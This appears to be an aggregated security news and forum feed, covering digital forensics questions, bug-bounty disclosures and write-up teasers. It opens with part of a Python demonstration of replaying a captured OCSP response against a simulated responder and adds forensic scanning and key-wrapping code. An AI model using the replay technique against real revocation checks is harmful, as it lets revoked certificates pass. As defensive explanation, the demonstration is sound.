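    fresh_nonce = os.urandom(16).hex()
    t1 = t0 + 10                           # replay shortly after: still inside the window
    t2 = t0 + VALIDITY + 1                 # replay after nextUpdate

    forged = json.loads(json.dumps(captured))   # attacker edits the nonce to match: signature breaks
    forged["body"]["nonce"] = fresh_nonce
    return {
        "naive_client": verify(captured, RESPONDER_KEY, t1, check_freshness=False),
        "freshness_only_inside_window": verify(captured, RESPONDER_KEY, t1),
        "freshness_only_after_window": verify(captured, RESPONDER_KEY, t2),
        "nonce_client": verify(captured, RESPONDER_KEY, t1, expected_nonce=fresh_nonce),
        "nonce_client_forged": verify(forged, RESPONDER_KEY, t1, expected_nonce=fresh_nonce),
        "genuine": verify(responder.respond({"serial": serial, "nonce": fresh_nonce}, now=t1),
                          RESPONDER_KEY, t1, expected_nonce=fresh_nonce),
    }


if __name__ == "__main__":
    for name, result in replay_demo().items():
        print(f"{name}: {result}")
```

For a localhost proof of concept against a real OCSP stack, the same interposition is done by pointing the client's responder URL at a small HTTP proxy that records one genuine response and afterwards returns it for every request; the "freshness_only_inside_window" result is the one to show, since it is the behaviour of a standards-conforming client that does not send nonces.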
  • Open

    NIST Study
    NIST has just released the final version of its Scientific Foundation for Digital Investigation https://www.nist.gov/spo/forensic-science-program/digital-investigation-techniques-nist-scientific-foundation-review. The study shows that the field has a firm scientific foundation with caveats about the rapid pace of change and technical limitations of some techniques. It includes an estimate of how many digital evidence labs there are in the US. For reference, there are 400 crime labs tracked by DoJ; NIST estimates that there are at least 11,000 DE labs. (Wow!) There are several other interesting discussions - especially about uncertainty and error rates. TL;DR error rates are not a good way to discuss uncertainty in DE. Use an error mitigation analysis instead. See SWGDE Establishing Confidence in Digital and Multimedia Evidence Forensic Results by Error Mitigation Analysis. submitted by /u/p-firecat [link] [comments]
    Discontinued SATA & IDE Write Blocker from CoolGear & Sharkoon
    submitted by /u/y8llow [link] [comments]
    Autopsy and Keywords in Unallocated Space/File Slack
    Hello, I have a test file image where I have placed some "Simulated" text info into file slack but I am unable to locate it with an Autopsy Keyword search. Is there a way to INDEX Unallocated and any Slack space from a drive so I can do a successful keyword search? Thanks for any help or direction... submitted by /u/Peardog_PA [link] [comments]
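Whatever the indexing settings of a particular tool, the cross-check a practitioner reaches for is a scan of the raw image bytes that ignores the file system entirely, so a string in file slack or an unallocated cluster is found like any other and reported by absolute offset and sector. The block below is an editor's example, not the poster's image or anything from Autopsy: it searches a dd-style image in chunks with an overlap so hits straddling a chunk boundary are not missed, in both ASCII and UTF-16LE (the encoding Windows uses for registry values, $MFT names and much application data, which an ASCII-only search silently misses). The 4 KiB sample image is constructed: a short "allocated" file, a token in its slack, a token placed across a 512-byte boundary, and a lower-case UTF-16LE copy in an unallocated area.

```python
import io
import re

SECTOR = 512


def build_patterns(keywords):
    """Compile each keyword as a case-insensitive bytes regex in ASCII and UTF-16LE."""
    pats = []
    for kw in keywords:
        for enc in ("ascii", "utf-16le"):
            needle = kw.encode(enc)
            pats.append((enc, kw, len(needle), re.compile(re.escape(needle), re.IGNORECASE)))
    return pats


def scan_stream(fp, keywords, chunk_size=1 << 20):
    """Scan a raw image byte by byte, ignoring the file system, so hits in file
    slack and unallocated clusters are reported like any other. Returns hits
    sorted by absolute offset, each with the sector it falls in."""
    pats = build_patterns(keywords)
    overlap = max(n for _, _, n, _ in pats) - 1   # enough of the previous chunk to catch a straddling hit
    hits, base, tail = [], 0, b""
    while True:
        block = fp.read(chunk_size)
        if not block:
            break
        buf = tail + block
        buf_start = base - len(tail)
        for enc, kw, _, pat in pats:
            for m in pat.finditer(buf):
                if m.end() <= len(tail):
                    continue                  # lay entirely inside the previous chunk: already reported
                off = buf_start + m.start()
                hits.append({"offset": off, "sector": off // SECTOR,
                             "sector_offset": off % SECTOR, "encoding": enc, "keyword": kw})
        base += len(block)
        tail = buf[-overlap:] if overlap > 0 else b""
    return sorted(hits, key=lambda h: h["offset"])


def scan_bytes(data, keywords, chunk_size=1 << 20):
    """Convenience wrapper for an in-memory image."""
    return scan_stream(io.BytesIO(data), keywords, chunk_size)


def build_sample_image():
    """Constructed 4 KiB image: an allocated file, a token in its slack, a token
    straddling a 512-byte chunk boundary, and a UTF-16LE copy in unallocated space."""
    img = bytearray(4096)
    body = b"Quarterly report. Nothing unusual here.\n" * 5   # logical file content, 200 bytes
    img[:len(body)] = body
    token = b"SIMULATED-SLACK-TOKEN"
    img[700:700 + len(token)] = token          # file slack: past EOF, inside the cluster
    img[1015:1015 + len(token)] = token        # crosses the 1024-byte boundary when chunk_size=512
    wide = "simulated-slack-token".encode("utf-16le")
    img[2500:2500 + len(wide)] = wide          # unallocated area, UTF-16LE, lower case
    return bytes(img)


if __name__ == "__main__":
    for hit in scan_bytes(build_sample_image(), ["SIMULATED-SLACK-TOKEN"], chunk_size=512):
        print(hit)
```

For a real image open the raw file (or the ewfmount/affuse exposure of an E01) and pass the file object to scan_stream(); the sector numbers map straight onto what a hex viewer or The Sleuth Kit's blkcat shows, which is how you confirm the hit is in slack rather than in an allocated file's content.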
    Ring doorbell no active subscription
    Working a case where a Ring doorbell was at the scene but there is likely no active subscription. Anyone know if the device will have any video stored on it? Does Ring possibly have any video stored in their cloud? submitted by /u/Wy2kWgm6JpLt [link] [comments]
    Emotet Strikes Again - LNK File Leads to Domain Wide Ransomware - The DFIR Report
    submitted by /u/TheDFIRReport [link] [comments]
    Autopsy Browser on Linux question
    Working on the CFReDS Hacking Case reference set to start getting a feel for forensics, I’m running into a problem with the Autopsy Browser on Kali. I’m running it on a homelab server and accessing it from a separate device’s browser and it feels like it lacks all of the features that Windows Autopsy has. As far as I can find, there’s no way to get OS information aside from version and file system type, whereas the Windows Autopsy program goes in-depth with that. Am I missing something, or is the Linux/Kali version of Autopsy just not good? Is it more useful to just learn the Windows version as opposed to practicing with the one offered on Linux? submitted by /u/TechThrowawayQR [link] [comments]
  • Open

OSINT: Searching by email address and username.
Snusbase indexes information from data leaks and provides search across compromised email addresses, usernames, names… Continue reading on Medium »
    Catching the scammer through cryptocurrency tracking. OSINT & CRYPTOCURRENCY.
    Original text and other information on OSINT is available at>>>> Continue reading on Medium »
  • Open

    potential denial of service attack via the locale parameter
    Internet Bug Bounty disclosed a bug submitted by benjaoming_realone: https://hackerone.com/reports/1746098 - Bounty: $2400
  • Open

OWASP Top 10 2021 one by one, A10: Server-Side Request Forgery (SSRF)
This series covers the changes to and content of each category in detail, with emphasis on the newly added ones. This instalment covers A10, Server-Side Request Forgery.
OWASP Top 10 2021 one by one, A09: Security Logging and Monitoring Failures
This series covers the changes to and content of each category in detail, with emphasis on the newly added ones. This instalment covers A09, Security Logging and Monitoring Failures.
FreeBuf Morning Report | Twitter's wave of departures hits its regulatory compliance and content moderation teams; the most-used password this year is still "password"
The most common passwords differ little from past years: password, 123456, 123456789, guest, qwerty, 12345678, 111111, 12345, col123456 and 123123.
fastjson 1.2.80 Attack
Analysis of the fastjson 1.2.80 exploitation chain, combined with JDBC attack techniques
Attribution Series | Tracing attacker information through compressed archives
How can attacker information be traced through compressed archive files?
CVE-2022-22963 vulnerability analysis
If anything below is incorrect, please point it out. Vulnerability analysis.
Gartner publishes the 2022 Hype Cycle for Security Technologies in China
The curve notes that, as domestic digital transformation advances, protecting enterprise digital assets has become a key task for security and risk management leaders.
Dell, HP and Lenovo devices use outdated OpenSSL versions
Binarly researchers found that Dell, HP and Lenovo devices are still using outdated versions of the OpenSSL cryptographic library.
No wonder Musk cut the entire security department: data on 5.4 million Twitter users published on the dark web
In addition, security researchers disclosed another, possibly leaked and much larger database containing tens of millions of Twitter records.
Citing threats to national security, the US bans sales of telecom and surveillance equipment from ZTE, Hikvision and others
The US government has banned the import and sale of telecommunications and surveillance equipment made by Chinese technology giants including Huawei and ZTE.
  • Open

    WinLogon Windows Reverse Shell Persistence
    Introduction Continue reading on The Gray Area »
    Home Grown Red Team: From Workstation To Domain Controller With Havoc C2 and Microsoft EDR
    Welcome back! In this blog entry we’ll be facing off with Microsoft’s Defender For Endpoint EDR once again to see if we can go from a low… Continue reading on Medium »
  • Open

    SecWiki News 2022-11-28 Review
Research on and improvement of the Havoc mutation strategy in AFL-family fuzzers, by ourren; NAUTILUS: grammar-aware greybox fuzzing, by ourren; 2022 Hype Cycle for Security Technologies in China, by ourren; SecWiki Weekly (Issue 456), by ourren; CobaltStrike 4.5 analysis summary, by ourren; MITRE ATT&CK round 5 evaluation results released, by Avenger. For more of the latest articles, visit SecWiki.
  • Open

    ‍IW Weekly #35: HTTP Desync Attack, Mass Account Takeover, SSRF via DNS Rebinding, Exploiting…
    No content preview
    Automate GitHub Actions Security Best Practices
    No content preview
    TryHackMe writeup: BadByte
    That lassie with the dragon tattoo took a bad byte — but nothing more than she can chew ;-) Continue reading on InfoSec Write-ups »
    Write-up: Basic server-side template injection (code context) @ PortSwigger Academy
    No content preview
    Python Malware Analysis
    No content preview
    A great weekend hack(worth $8k)
    No content preview
    TryHackMe WriteUp: Warzone 2
    No content preview
    How I hacked into a government e-learning website
    No content preview
Fun SQL Injection 3: a practical MSSQL example | In Spanish
Hello dear reader, I am truly glad that you are giving me a little of your valuable time to read the following piece. In this… Continue reading on InfoSec Write-ups »
  • Open

    How to get EDRs?
    Hi! Red Teamers, how do you get EDRs to test your payloads? I understand it is essential to test your payloads, but getting an EDR seems to be the real challenge. Do you have some solutions known to be easier to get than others? Or ones that have more interesting detection capabilities which are good to test your payloads on? submitted by /u/hegusung
    Koxic ransomware spreading in South Korea
    Author: ASEC BLOG. Translator: Knownsec 404 Lab translation team. Original link: https://asec.ahnlab.com/en/42343/ The Koxic ransomware is reported to be spreading within South Korea. It was first discovered earlier this year; recently the team found a file with a modified appearance and a modified internal ransom note, which was detected and blocked by the ASD infrastructure. On infection, the ".KOXIC_[Random string]" extension is appended to the names of encrypted files, and in each...
    Challenge 7 Write-up
    Dr. Ali Hadi recently posted another challenge image, this one (#7) being a lot closer to a real-world challenge than a lot of the CTFs I've seen over the years. What I mean by that is that in the 22+ years I've done DFIR work, I've never had a customer pose more than 3 to 5 questions that they wanted answered, certainly not 51. And, I've never had a customer ask me for the volume serial number in the image. Never. So, getting a challenge that had a fairly simple and straightforward "ask" (i.e., something bad may have happened, what was it and when??) was pretty close to real-world. I will say that there have been more than a few times where, following the answers to those questions, customers would ask additional questions...but again, not 37 questions, not 51 questions (like we see in …

    How to deal with non-techs who give me tech tips
    Hi folks. I have recently earned a Master's in Cybersecurity and have done some freelance work at small businesses in my area. I have been working with computers in my free time since the days of DOS, WordPerfect, and dot-matrix printers. I have found it difficult lately to deal with family members who insist on providing me with information on the latest cyberthreat video or article that they find on the internet. Often the videos demonstrate threats that are hoaxes and could leave a viewer thinking they have security awareness while the most common methods and safeguards are missed. I find this frustrating. It is really difficult because I don't want to seem like a "know-it-all," but I want to say "damn, you know I didn't go to school and graduate at the top of my class for nothing." I feel like an alien sometimes. Please share some kind advice. submitted by /u/DataQUeen_718
    Help with skills to focus on for 2023
    Hello there, I am reaching out to the community for help making the career change into IT/security. I recently finished my master's in systems security to help bridge some experience gaps and overcome the dreaded HR checklist requirement. However, I am experiencing a bit of frustration when it comes to figuring out what skills employers are looking for. Any job postings I come across are incredibly vague, with the usual sprinkle of exaggerated requirements for an entry-level job. Ideally, I would like to enter an entry-level SOC job, as research shows that's a great position to start in and get lots of exposure to different scenarios. My question is, what skills should I be focusing on, and what is fluff someone from HR wrote on the requirements when they googled "cyber security skills"? submitted by /u/Cpt-Dynamite
    What are the requirements to become a pen tester?
    Hi. I would like to become a pen tester after college, and I was wondering why some pen testing jobs require that you gain IT and cybersecurity experience first. How do I gain IT and/or cybersecurity experience after college? submitted by /u/AlternativeNo5023
    Need opinions on the situation
    My company deals with data hosting & server backends. Currently, some parts of the company are in need of major upgrades due to multiple breakdowns & issues. Management is planning to replace some aging APs, routers & CCTVs within my company. I've been told to look for some prospective equipment; however, management wants to cut down costs but at the same time is requiring secured equipment. My company is a medium-sized enterprise with 60 people across all the various departments. I've looked at some of the equipment from the different providers. At this point in time I'm considering products from Mikrotik, Juniper, Cisco & Arcadyan. However, the prices quoted to me go beyond the budget allotted. Hence, it has been an issue. On the other side, I'm looking at ZTE, Huawei, Ruijie, Dahua & Hikvision equipment. They've a wider selection of equipment to choose from & it easily meets the budget requirements based on the quotations given. I'd be keen on using the equipment; however, I'd have to run it by the management. I brought my proposals to my manager with the quotation. He was open to my suggestions on using Chinese equipment; however, he was more in favour of equipment from Taiwan & South Korea due to possible vulnerabilities/backdoors it might contain. However, when I discussed the quotations given by the vendors & other related costs, he told me that he'll speak to the finance team regarding this. I'd like opinions here as I believe that every product has a vulnerability regardless of the origin of the manufacturer. What would y'all suggest? Should management only look at Taiwanese, South Korean & Western manufacturers or consider Chinese manufacturers as well? submitted by /u/LMJR500Army
    Is developer or helpdesk/sysadmin better for a cybersecurity career later?
    I'm 22 and I'm a student at an evening computer science high school because I dropped out as a teenager. I'm still a beginner; at the moment I'm studying C programming and how Linux works. In the future I would like to study malware and reverse engineering mainly, but I would like to try offensive stuff too: pentesting, bug bounty, vulnerability research/exploit dev... What would be the best first job to get a foot in the door? Developer? In my country that's mainly backend web stuff. Helpdesk/Sysadmin? Few jobs in my country. submitted by /u/NewbieInTech00
    The Untold SendBird Misconfigurations
    At a random bug hunting collaboration with my team (thaivu, lamscun, thefool45, fergustr4n), we had bumped into a random private target as… Continue reading on Medium »
    Firebase exploit bug bounty
    Recently I managed to exploit a read/write permission on Firebase, but unfortunately it was marked as not applicable; honestly it was also… Continue reading on Medium »
    Blockchain Books​
    We at WeFuzz, have created a collection of fantastic books for you if you’re looking to go further down the rabbit hole of #Web3. 🐰🐇 Continue reading on Medium »
    First Bug Bounty For Homeland Security Uncovers 122 Vulnerabilities
    What exactly is the Hack DHS Program? Continue reading on Bug Zero »
    Unique rate limit bypass worth $1800
    Proving the organization's statement wrong with an out-of-scope rate limit bypass. Continue reading on Medium »
    How to Install Gf Tool and Patterns on Kali Linux
    Install Gf tool and It’s Pattern on Kali Linux with Easy Simple Steps Continue reading on System Weakness »
    2FA Enabled Accounts Can Bypass Authentication & Access Account After Deactivation
    Hello All, Continue reading on Medium »
    Access Any Owner Account without Authentication (Auth bypass + 2FA bypass)
    Hello Folks, Continue reading on Medium »
    Bug Hunting 101: Exploiting Cross-Site Request Forgeries (CSRF)
    TL;DR- A quick and concise overview of CSRFs. What they are, what they can do, and how you can best benefit from them in bug bounty… Continue reading on The Gray Area »
    An OSINT field specialist’s dream…
    I often have to use different operating systems. This is due to the fact that not every Kali or MacOS can run specific investigation… Continue reading on Medium »
    Shodan — Computer Search Engine | OSINT Framework #2
    What is Shodan? Continue reading on Medium »
    SPY NEWS: 2022 — Week 47
    Summary of the espionage-related news stories for the Week 46 (November 20–26) of 2022. Continue reading on Medium »
    ✈️ OSINT: Searching for an aircraft
    Continue reading on Medium »
    Email recipient logging rules…
    To successfully identify your interlocutor by correspondence, you should adhere to the following basic rules: Continue reading on Medium »
    OSINTGRAM — A creepy way to scrub data from Instagram
    I recently could set up my dedicated Kali machine. Nothing special, just 16 GB of RAM running off a ThinkPad. While searching for some… Continue reading on Medium »
    Hacking Smartwatches for Spear Phishing – Red Team Ops – Cybervelia
    submitted by /u/Necessary-Reality-80
    Another botnet written in Golang: KmsdBot
    Through its globally deployed honeypots, Akamai recently discovered KmsdBot, a botnet tailored to the gaming industry with both DDoS and cryptocurrency-mining capabilities.
    The whistle blows, and World Cup-related fraud surges too
    The 2022 World Cup has begun, and scams targeting football fans through fake streaming sites and lotteries have surged.
    A few small exploitation tricks for c3p0
    c3p0 is used to create and manage connections; it reuses connections through a "pool" to reduce resource overhead, and like other data sources it also offers connection-count control, connection reliability testing, connection leak control, statement caching and other features.
    Drone attacks: an airborne cybersecurity nightmare
    This article explores the cybersecurity considerations around drone platforms by reviewing drone market trends, popular drone hacking tools, and general drone hacking techniques that could be used to compromise enterprise drone platforms.
    ICS cyber threat predictions for 2023
    Kaspersky predicts that the situation in the coming year may be considerably more complex. In analysing the cybersecurity events of 2022, we must admit that we have entered a new era.
    Vulnerability in AWS AppSync allowed unauthorized access to cloud resources
    Article URL: https://portswigger.net/daily-swig/vulnerability-in-aws-appsync-allowed-unauthorized-access-to-cloud-resources Comments URL: https://news.ycombinator.com/item?id=33764013 (1 point, 0 comments)
    SecWiki News 2022-11-27 Review
    A preliminary look at basic security issues in Java development and how to solve them, by 路人甲. For more recent articles, visit SecWiki
    Live Forensics | What data you can recover or extract from RAM Memory | Volatile Data | Lecture
    submitted by /u/CybDig
    House projects in Kazakhstan
    A quite big collection of building projects in Kostanay, Kazakhstan. http://109.248.156.247/ submitted by /u/GloomyGenius
    TryHackMe Write-up: Internal
    Primer Continue reading on Medium »
    HIDE C2 SERVER WITH HTTP FORWARDERS
    A redirector or traffic forwarder is basically a proxy between the red team's server (say, the one sending phishing emails, or the C2)… Continue reading on Medium »
    Wordpress users Disclosure [ /wp-json/wp/v2/users/ ]
    MTN Group disclosed a bug submitted by shubham_srt: https://hackerone.com/reports/1735586

    IP question
    IP address question. Hello, I'm asking this because I know nothing about this. A random guy on Facebook told me under a random page that he claims to have traced my IP address, all this just by sending a message on my Facebook Messenger; but I don't have Messenger installed on my phone, so I want to ask if what he says is true or not. Thanks for every answer. submitted by /u/Gino-Pizza
    Reverse engineering homelab, GDB and multiple architectures?
    I recently competed in a CTF where I spent a large amount of time trying to get GDB to reverse a binary on both my Mac and Raspberry Pi. At one point I installed the 'multiarch' version of GDB on the Raspberry Pi but was still not very successful. How would I create a homelab that could support as many architectures as possible (so I can be ready to RE any given binary or executable)? What are the tradeoffs of building a homelab with multiple architectures vs multi-architecture support in software like GDB? submitted by /u/UnemployedAWSGuy
    How do you (or what are the best practices to) protect your important files in the cloud?
    I was thinking about just writing myself an easy little Python program with PyNaCl to handle file encryption/decryption locally prior to upload. https://pynacl.readthedocs.io/en/latest/secret/ (XSalsa20 + Poly1305) Any other suggestions? submitted by /u/Tough-Win-9367
    Does having n passwords for the same data lower security by 1/n?
    I have never seen any existing application that allowed me to assign more than 1 password to a single piece of data, but I am afraid of forgetting the password and subsequently losing the data, so I have been thinking of writing my own tool that can allow me to use more than one password. The concept is simple: it will generate some random key, and use that key to encrypt the data. And then it encrypts that key with any number of passwords I enter. So, if I enter 10 passwords, it will have 10 encrypted keys. Later, if I enter any one of the 10 passwords, it will be able to decrypt the key, and use that key to decrypt the data. So, unless I forget all 10 passwords, I would not lose the data. My question is, does having n keys weaken the security by just 1/n, or by more than 1/n? I mean, if it is 1/n, then using 10 passwords would be 1/10 security, but 2^128/10 is practically not much different from 2^128 (e.g., like 100 million years instead of 1 billion years for a brute-force attack). submitted by /u/evolution2015
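The key-slot scheme described in the post above (one random data key, wrapped separately under each password), as an added stdlib-only Python example; this is not the poster's code or any existing tool, and the scrypt cost parameters are illustrative assumptions. Each slot turns the password plus a unique salt into a one-time 32-byte mask and a MAC key; the data key is XORed with the mask and the result authenticated with HMAC, so any one password recovers the same key and a wrong password is rejected cleanly. The `unwrap_key` loop is also exactly what an attacker runs per guess, which is where the n enters: the random data key itself (256-bit here, 2^128 in the post's arithmetic) is untouched, but each guessed password is tested against all n slots, so password guessing becomes up to n times more productive and the whole thing is only as strong as the weakest password. Encrypting the data under the data key would use a real AEAD (for example the PyNaCl SecretBox mentioned in the previous post) and is left out here.

```python
import hashlib
import hmac
import os
import secrets
from typing import Dict, List, Optional

# Added example of the multi-password key-slot idea from the post: one random
# data key, wrapped once per password. Stdlib only; the scrypt parameters are
# an illustrative assumption (raise them for real use).

KEY_LEN = 32
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1

Slot = Dict[str, bytes]


def _slot_keys(password: str, salt: bytes):
    """Derive a one-time 32-byte mask and a 32-byte MAC key from one password.
    The salt is unique per slot, so the same password never yields the same mask."""
    out = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                         n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=2 * KEY_LEN)
    return out[:KEY_LEN], out[KEY_LEN:]


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _tag(mac_key: bytes, salt: bytes, wrapped: bytes) -> bytes:
    return hmac.new(mac_key, salt + wrapped, hashlib.sha256).digest()


def new_data_key() -> bytes:
    """The single random key the data is actually encrypted under."""
    return secrets.token_bytes(KEY_LEN)


def wrap_key(data_key: bytes, passwords: List[str]) -> List[Slot]:
    """One slot per password: mask the data key with the password-derived mask
    (a one-time pad, since each mask is used exactly once) and authenticate the
    masked value so a wrong password fails the tag check instead of returning junk."""
    slots = []
    for pw in passwords:
        salt = os.urandom(16)
        mask, mac_key = _slot_keys(pw, salt)
        wrapped = _xor(data_key, mask)
        slots.append({"salt": salt, "wrapped": wrapped,
                      "tag": _tag(mac_key, salt, wrapped)})
    return slots


def unwrap_key(password: str, slots: List[Slot]) -> Optional[bytes]:
    """Try one password against every slot; return the data key from the first
    slot whose tag verifies, else None. An attacker runs this same loop for each
    guessed password: one guess costs n KDF runs but also covers n passwords."""
    for s in slots:
        mask, mac_key = _slot_keys(password, s["salt"])
        if hmac.compare_digest(_tag(mac_key, s["salt"], s["wrapped"]), s["tag"]):
            return _xor(s["wrapped"], mask)
    return None


def add_slot(slots: List[Slot], known_password: str, new_password: str) -> None:
    """Add another password later: unlock with a password you already have,
    then wrap the data key once more. No data needs re-encrypting."""
    data_key = unwrap_key(known_password, slots)
    if data_key is None:
        raise ValueError("known_password did not open any slot")
    slots.extend(wrap_key(data_key, [new_password]))


def remove_slot(slots: List[Slot], password: str) -> bool:
    """Revoke one password without touching the others. Returns True if a slot
    was removed. The data key itself is unchanged, so if it may already have
    leaked the data must be re-encrypted under a fresh key instead."""
    for i, s in enumerate(slots):
        mask, mac_key = _slot_keys(password, s["salt"])
        if hmac.compare_digest(_tag(mac_key, s["salt"], s["wrapped"]), s["tag"]):
            del slots[i]
            return True
    return False


if __name__ == "__main__":
    dk = new_data_key()
    slots = wrap_key(dk, ["correct horse", "battery staple"])
    assert unwrap_key("battery staple", slots) == dk
    assert unwrap_key("wrong", slots) is None
    add_slot(slots, "correct horse", "third password")
    assert unwrap_key("third password", slots) == dk
    print(f"{len(slots)} slots; any one password recovers the same 256-bit key")
```

The slot layout is the same idea disk-encryption formats use for multiple passphrases; the weakest-password caveat applies to those just as much, which is why adding a throwaway "backup" password to a strong one is a downgrade rather than a safety net.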
    Rogue Agents Writeup
    The exact location is where you always find it. Continue reading on The Sleuth Sheet »
    A walkthrough of CyberDefenders “GrabThePhisher — Threat intel” CTF
    Good day, my name is Eduzor Kamsi and today I'll walk you through the GrabThePhisher posted on CyberDefenders. Continue reading on Medium »
    OSINT: YouTube videos
    YouTube Metadata. Standard YouTube metadata gathers individual details about a video and its uploader, and about a playlist and its creator… Continue reading on Medium »
    Explaining vulnerabilities : Template Injections (Server-Side) {Bug bounties}
    What are template engine injection vulnerabilities? Continue reading on Medium »
    [Hacking Bank] The Second Story of Finding Critical Vulnerabilities on Banking Application
    This is new story about reversing a banking application that use “Xamarin” platform , bypass the integrity of the requests and finding… Continue reading on Medium »
    WebView XSS, account takeover
    DALL-E prompt: Medium story preview picture for a blog on cybersecurity but with robots Continue reading on Medium »
    A great weekend hack(worth $8k)
    This post is a writeup of my recent findings on Synack which got me $8k for 5 bugs, on a single day. Continue reading on InfoSec Write-ups »
    Hacking Dutch Government-Broken Authentication To Full Website Takeover (P1)
    Hey guys , Continue reading on System Weakness »
    How I hacked into a government e-learning website
    DATE: 07/11/2022 Continue reading on InfoSec Write-ups »
    Exploiting an N-day vBulletin PHP Object Injection Vulnerability
    submitted by /u/eg1x
    So, you want to get into bug bounties?
    submitted by /u/Mempodipper
    Exploiting CORS Misconfigurations
    submitted by /u/6W99ocQnb8Zy17
    SecWiki News 2022-11-26 Review
    CVE-2022-42920: BCEL arbitrary file write vulnerability, by 路人甲. An analysis of the US open-source software security evaluation framework, by ourren. For more recent articles, visit SecWiki
    Why is Digital Forensics seemingly one of the most underpaid fields in the whole of IT?
    Firstly I'll preface this by saying I live and work in the UK, so it may just be a country-specific thing, but it seems to me that DF is massively underpaid when compared to other cyber security jobs, especially considering the responsibilities we take on as expert witnesses and the things we are exposed to on a day-to-day basis. I am a DFI in LE with 6 years' experience currently earning in the mid 30s PA and it seems like I am doing better than a lot of my colleagues at other forces. It also seems as though pay isn't that great in the private sector, so it doesn't seem to be a problem exclusive to the public sector. All job adverts I have seen recently ask for experienced investigators but none of them pay anywhere near what SOC jobs would pay for a similarly experienced SOC analyst. I guess I'm just fed up and venting, but I am looking for advice because I can no longer continue working in an industry with minimal pay, no progression and exposure to things that take a toll on my mental health. Maybe a transition into a cyber role is what I need, but I feel as though my knowledge and skills are so specific to DF that they won't transition over. Thanks for reading. submitted by /u/sam0320
    Analysing my mobile device for coursework using a logical image in Autopsy: 2 sets of device information?
    Apologies for the poor picture. I am doing coursework where I do an analysis of my device. I have the Google Pixel 2. I have crossed out some information, but these are 2 screenshots in my Word document where I am writing my report on the analysis. I've found 2 sets of device information: Google Pixel 2 information and Samsung Galaxy Alpha SM-G850F information. I don't own a Samsung Galaxy Alpha. Would anyone be able to tell me why this information is in my logical image? Thank you for your time. submitted by /u/ghostmale37
    Clear Logs in Hacked System
    Introduction Continue reading on Medium »
    Is there any tool to extract and list all files and their URLs from an open directory? Hope to get a solution from here :)
    submitted by /u/gingerteaforthesoul
    Exception logging in Sharepoint app reveals clear-text connection details
    Nextcloud disclosed a bug submitted by kichernde_erbse: https://hackerone.com/reports/1652903
    CVE-2022-42915: HTTP proxy double-free
    curl disclosed a bug submitted by bagder: https://hackerone.com/reports/1722065
    CVE-2022-32221: POST following PUT confusion
    curl disclosed a bug submitted by robbotic: https://hackerone.com/reports/1704017
    Profile of disabled user stays accessible
    Nextcloud disclosed a bug submitted by mikaelgundersen: https://hackerone.com/reports/1675014 - Bounty: $100
    Database resource exhaustion for logged-in users via sharee recommendations with circles
    Nextcloud disclosed a bug submitted by michag86: https://hackerone.com/reports/1688199 - Bounty: $250
    A long road ahead: regulatory trends in cyberspace
    This year, the continued tension in international relations has undoubtedly had a major impact on both cyberspace and cybersecurity. Below are Kaspersky's observations on development trends in cyberspace.

    Explaining vulnerabilities : File inclusion {Bug bounties}
    File inclusion vulnerabilities are part of the OWASP top ten. In this article, I’ll explain what they are,how to find them, how to exploit… Continue reading on Medium »
    How I Got the Hall of Fame in Few minutes
    Hello Awesome INFOSEC COMMUNITY, I hope you all doing well! This Write-up is about how I got the hall of fame in few minutes. Today I’m… Continue reading on Medium »
    P1 Bug — Leaked Zendesk Token in GitHub
    Spanish version. Continue reading on Medium »
    Bug Zero at a Glance [Week 19–25 November]
    What happened with Bug Zero? Continue reading on Bug Zero »
    P1 Bug Hunting — Exploiting Common Wordpress Vulnerabilities
    TL;DR- Some great tips on pen-testing Wordpress sites, finding common misconfiguration exploits and great vulnerabilities for bug bounties. Continue reading on The Gray Area »
    Explaining vulnerabilities : OS command injection {Bug bounties}
    Injection is one of the most impactful and severe bugs that can be found on a web application, falling right under broken access control… Continue reading on Medium »
    EnCase: index search issue
    Hello, I have created a .L01 image of a .PST file and need to perform searches. I ran the processor option 'index text and metadata', and the job completed successfully according to Processor Manager. However, when I attempt to search using the index, I get zero hits. I know for a fact these words appear in the data since I also ran a keyword search through the processor which provided matches. Any ideas what the issue might be? Thanks! submitted by /u/forvestic
    Unallocated file date accuracy (TSK)
    Good morning! I'm working on my project and I found a file that is a solid indicator of compromise. The filename is a hash, it shows as an application/octet-stream and has path c:/Users/$user/AppData/Local/Packages/Microsoft.Windows[...]. In other words, it does not say orphan. The dates shown in Autopsy for created, accessed, changed, and modified are all the same (sometime in the spring). How confident can I be about this date? If it's correct, it would signal that the system compromise goes back to the spring. However, I'm not sure how I can assess how valid this date is. I saw it has been mentioned that I could open it with a hex editor and carve/offset items? This is my first project and I do not have a solid grasp of those concepts yet. Thanks so much for the assistance! I have hardly slept trying to figure these things out. submitted by /u/JimmyMcTrade
    Not sure where to begin
    TL;DR: I want to drop out of my Master's program and switch to a digital forensics based future, but I'm not sure what my best options are. So. A quick bit of background. I graduated in 2014 with a Bachelor's degree in Forensic Science. I started working as a Crime Scene Investigator, and did that for 3 years before a position opened at my agency to switch to the Real Time Crime Center (RTCC) as a Crime Analyst. I took the position there because it paid better, but still applied for lab positions on the side with my state police crime labs whenever I could. I couldn't stand the work at RTCC, and my old college reached out to me stating that they were set to start their Master's program soon. In my head, I could continue at RTCC while I did the Master's program and then move on, since the…
    SSRF mitigation bypass using DNS Rebind attack
    Concrete CMS disclosed a bug submitted by adrian_t: https://hackerone.com/reports/1369312
    open redirect to a remote website which can phish users
    Concrete CMS disclosed a bug submitted by adrian_t: https://hackerone.com/reports/1397804
    SSRF - pivoting in the private LAN
    Concrete CMS disclosed a bug submitted by adrian_t: https://hackerone.com/reports/1364797
    XSS in Desktop Client in call notification popup
    Nextcloud disclosed a bug submitted by mikeisastar: https://hackerone.com/reports/1711847
    XSS in Desktop Client via user status and information
    Nextcloud disclosed a bug submitted by mikeisastar: https://hackerone.com/reports/1707977
    XSS in Desktop Client in the notifications
    Nextcloud disclosed a bug submitted by mikeisastar: https://hackerone.com/reports/1668028 - Bounty: $750
    How do you follow up for clarification with Google's Bug Hunters system if they closed the case?
